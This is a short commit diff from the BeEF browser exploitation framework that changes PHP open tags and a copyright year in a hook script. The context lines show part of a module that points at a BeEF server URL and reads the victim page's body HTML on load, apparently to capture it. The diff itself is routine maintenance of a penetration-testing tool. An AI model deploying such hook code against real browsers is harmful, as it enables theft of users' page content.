<? changed to <php and some minor changes
git-svn-id: https://beef.googlecode.com/svn/trunk@21 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
This commit is contained in:
@@ -1,5 +1,5 @@
|
||||
<?
|
||||
// Copyright (c) 2006-2009, Wade Alcorn
|
||||
<?php
|
||||
// Copyright (c) 2006-2010, Wade Alcorn
|
||||
// All Rights Reserved
|
||||
// wade@bindshell.net - http://www.bindshell.net
|
||||
|
||||
@@ -8,7 +8,7 @@
|
||||
|
||||
onload = beef_onload;
|
||||
|
||||
beef_url = "<?= BEEF_DOMAIN; ?>";
|
||||
beef_url = "<?php echo BEEF_DOMAIN; ?>";
|
||||
|
||||
function beef_onload() {
|
||||
raw_imap_output=document.body.innerHTML;
|
||||
|
||||
Reference in New Issue
Block a user